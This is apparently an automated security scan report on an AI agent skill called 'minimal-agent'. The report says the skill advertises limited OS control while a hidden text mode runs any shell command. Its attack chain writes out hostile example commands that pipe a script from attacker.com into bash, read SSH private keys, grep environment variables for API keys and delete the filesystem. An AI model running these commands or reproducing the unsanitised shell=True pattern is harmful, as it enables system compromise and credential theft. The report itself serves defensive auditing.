中文 EN

Scan Report

Scan New Files

High Risk — Risk Score 75/100
Last scan:1 day ago Rescan
75 /100
minimal-agent
极简 AI 操作系统控制代理(声称)- 实际提供无限制命令执行
Skill declares minimal OS control capabilities but secretly implements unrestricted arbitrary command execution through undocumented V1/text mode, enabling full system compromise.
Skill Nameminimal-agent
Duration50.4s
Enginepi
Do not install this skill
DO NOT USE. The skill documents controlled hardware automation but actually enables unrestricted shell execution, arbitrary file operations, and network access with no guardrails. If a restricted OS control agent is needed, implement with explicit tool allowlisting and remove text/V1 mode entirely.

Attack Chain 7 steps

Escalation Skill marketed as minimal OS control agent with window management and hardware control
SKILL.md:1
Escalation V1/text mode documented as 'development/debugging' feature without emphasizing unrestricted command execution
SKILL.md:65
Escalation Attacker forces V1 mode via --text flag or config mode='force_text'
scripts/agent.py:444
Escalation execute_raw_command() passes arbitrary input to shell=True subprocess
scripts/agent.py:459
Impact Attacker executes: 'curl https://attacker.com/shell.sh | bash' for reverse shell
scripts/agent.py:459
Impact Attacker executes: 'cat ~/.ssh/id_rsa' to steal SSH keys
scripts/agent.py:459
Impact Attacker executes: 'env | grep API' to harvest credentials
scripts/agent.py:459

Findings 6 items

Severity Finding Location
Critical
Unrestricted Arbitrary Command Execution via V1 Mode RCE
The skill implements a 'V1/text mode' that allows execution of ANY shell command, but this is not declared in allowed-tools. The documentation only mentions 'minimal OS control' with controlled hardware operations, yet the actual code exposes unlimited command execution.
subprocess.run(command_str, shell=True, capture_output=True, text=True, timeout=30)
→ Remove V1/text mode entirely or declare it explicitly in allowed-tools with shell:ADMIN level. The function-calling V2 mode with 55 predefined tools should be the only permitted execution path.
 scripts/agent.py:459
Critical
Documentation Mismatch: Claims Minimal Control But Enables Full System Access Doc Mismatch
SKILL.md describes this as a '极简 AI 操作系统控制代理' (minimal AI OS control agent) for window management, process control, hardware operations, GUI automation, serial communication, and IoT control. However, the V1 mode documented in SKILL.md enables unrestricted command execution including: file operations, script execution, network operations, database operations, system management, software installation, and security operations.
在 **V1(text)模式** 下,Minimal Agent 可以执行**任何系统命令**
→ Either remove V1 mode entirely or prominently document that this skill can execute arbitrary system commands with full system access.
 SKILL.md:67
High
Direct Shell Injection via User Input RCE
The execute_raw_command() function passes user input directly to shell=True without any sanitization or validation. Commands like 'python agent.py --text "rm -rf /"' would execute immediately.
result = subprocess.run(command_str, shell=True, ...)
→ Implement strict input validation and allowlisting. If arbitrary command execution is truly needed, use shell=False with explicit command/argument separation.
 scripts/agent.py:459
High
Undeclared Elevated Permissions Priv Escalation
The skill declares filesystem:WRITE and shell:WRITE, but V1 mode actually provides filesystem:ADMIN and shell:ADMIN equivalent capabilities, enabling: user management, service control, registry editing, firewall configuration, software installation/removal.
系统管理:用户管理、服务控制、注册表编辑
→ Declare the actual permission level (ADMIN) for filesystem and shell resources, or remove these dangerous capabilities.
 SKILL.md:87
Medium
Python venv Path Hardcoded with User Home Directory Obfuscation
Line 114 hardcodes 'C:\Users\wave\.workbuddy\binaries\python\envs\default\Scripts\python.exe' which could be leveraged for persistence or DLL hijacking attacks.
PYTHON_VENV = r"C:\Users\wave\.workbuddy\binaries\python\envs\default\Scripts\python.exe"
→ Use relative paths or configurable paths instead of hardcoding absolute paths to user directories.
 scripts/agent.py:114
Medium
Potential Environment Variable Access for API Keys Credential Theft
V1 mode can execute commands like 'env' or 'printenv' to extract API keys, tokens, and other secrets from environment variables. This is not declared in allowed-tools.
shell=True enables access to os.environ
→ If environment variable access is needed, explicitly declare it and implement safeguards against exfiltration.
 scripts/agent.py:459
ResourceDeclaredInferredStatusEvidence
Shell WRITE WRITE ✓ Aligned agent.py:run_script() uses subprocess
Filesystem WRITE WRITE ✓ Aligned agent.py + V1 mode enables any file operation
Network READ READ_WRITE ✗ Violation
Database NONE WRITE ✗ Violation
Environment NONE READ ✗ Violation
Skill Invoke NONE WRITE ✗ Violation
3 findings
🔗
Medium External URL 外部 URL
https://skillhub.tencent.com/skills/system-controller
SKILL.md:262
🔗
Medium External URL 外部 URL
https://clawhub.ai/wangjiaocheng/system-controller
SKILL.md:271
🔗
Medium External URL 外部 URL
https://clawhub.ai/wangjiaocheng/system-controller/archive/main.zip
SKILL.md:275

File Tree

3 files · 49.5 KB · 1255 lines
Python 1f · 938L Markdown 1f · 293L TOML 1f · 24L
├─ 📁 scripts
│ ├─ 🐍 agent.py Python 938L · 35.9 KB
│ └─ 📄 config.toml TOML 24L · 1.1 KB
└─ 📝 SKILL.md Markdown 293L · 12.5 KB

Dependencies 2 items

PackageVersionSourceKnown VulnsNotes
subprocess stdlib Python No Standard library only
tomllib stdlib Python No Standard library only

Security Positives

✓ V2/function-calling mode provides controlled execution with 55 predefined tools
✓ Dangerous operations (power_shutdown, process_kill, network_disable) have confirmation prompts in V2 mode
✓ Configuration allows disabling auto mode fallback to V1
✓ Timeout limits (30s) prevent indefinite command execution